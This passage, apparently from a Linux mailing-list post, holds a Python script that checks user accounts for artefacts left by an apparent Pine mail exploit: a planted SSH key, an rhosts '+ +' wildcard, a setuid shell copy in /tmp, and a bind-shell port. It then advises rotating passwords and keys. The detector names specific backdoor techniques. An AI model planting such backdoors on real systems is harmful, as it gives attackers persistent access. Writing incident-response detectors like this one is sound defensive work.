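hidden path) come from the quoted script; demo()'s planted files are
constructed here.
"""
import os
import shutil
import stat
import tempfile

KEY_COMMENT = "x4334@AGRI"                       # comment on the planted SSH1 key
HIDDEN_SHELL = os.path.join(".pkoss493", ".rc")  # cp /bin/sh ...; chmod 4715
BACKDOOR_PORT = 56789                            # #define PORT in io.c
PROC_NET_TCP = "/proc/net/tcp"


def listening_ports(proc_net_tcp=PROC_NET_TCP):
    """Local TCP ports in LISTEN state (st == 0A) from a /proc/net/tcp table."""
    ports = set()
    try:
        with open(proc_net_tcp) as fh:
            next(fh)                                  # column header
            for line in fh:
                fields = line.split()
                if len(fields) > 3 and fields[3] == "0A":
                    ports.add(int(fields[1].rsplit(":", 1)[1], 16))
    except (OSError, StopIteration):
        pass
    return ports


def audit(home, tmp="/tmp", proc_net_tcp=PROC_NET_TCP):
    """Return (tag, detail) findings for one account's home directory."""
    findings = []
    auth_keys = os.path.join(home, ".ssh", "authorized_keys")
    if os.path.isfile(auth_keys):
        with open(auth_keys) as fh:
            if any(KEY_COMMENT in line for line in fh):
                findings.append(("ssh-key", auth_keys))
    rhosts = os.path.join(home, ".rhosts")
    if os.path.isfile(rhosts):
        with open(rhosts) as fh:
            if any(line.split() == ["+", "+"] for line in fh):
                findings.append(("rhosts-wildcard", rhosts))
    shell = os.path.join(tmp, HIDDEN_SHELL)
    if os.path.exists(shell):
        mode = os.stat(shell).st_mode
        suid = " setuid" if mode & stat.S_ISUID else ""
        findings.append(("shell-copy", "%s mode %o%s" % (shell, mode & 0o7777, suid)))
    if BACKDOOR_PORT in listening_ports(proc_net_tcp):
        findings.append(("bind-shell-port", str(BACKDOOR_PORT)))
    return findings


def demo():
    """Plant all four artefacts in a scratch tree (constructed data) and audit it."""
    root = tempfile.mkdtemp()
    try:
        home, tmp = os.path.join(root, "home"), os.path.join(root, "tmp")
        os.makedirs(os.path.join(home, ".ssh"))
        os.makedirs(os.path.join(tmp, ".pkoss493"))
        with open(os.path.join(home, ".ssh", "authorized_keys"), "w") as fh:
            fh.write("512 35 1234567 " + KEY_COMMENT + "\n")   # placeholder modulus
        with open(os.path.join(home, ".rhosts"), "w") as fh:
            fh.write("+ +\n")
        shell = os.path.join(tmp, HIDDEN_SHELL)
        with open(shell, "w") as fh:
            fh.write("#!/bin/sh\n")                  # stand-in for the copied /bin/sh
        os.chmod(shell, 0o4715)
        tcp = os.path.join(root, "tcp")              # fabricated /proc/net/tcp
        with open(tcp, "w") as fh:
            fh.write("  sl  local_address rem_address   st tx_queue rx_queue "
                     "tr tm->when retrnsmt   uid  timeout inode\n")
            fh.write("   0: 00000000:DDD5 00000000:0000 0A 00000000:00000000 "
                     "00:00000000 00000000     0        0 1 1 0 100 0 0 10 0\n")  # 0xDDD5 == 56789
        return audit(home, tmp, tcp)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for tag, detail in demo():
        print(tag, detail)
```

Run `audit(os.path.expanduser("~"))` as every user whose Pine session could have rendered the message, root first; the listener check reads the live `/proc/net/tcp` by default. A hit on any of these also means the script mailed `/etc/passwd` and `/etc/shadow` out, so the response is password changes and key rotation, not just deleting the files.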
More information about the Linux mailing list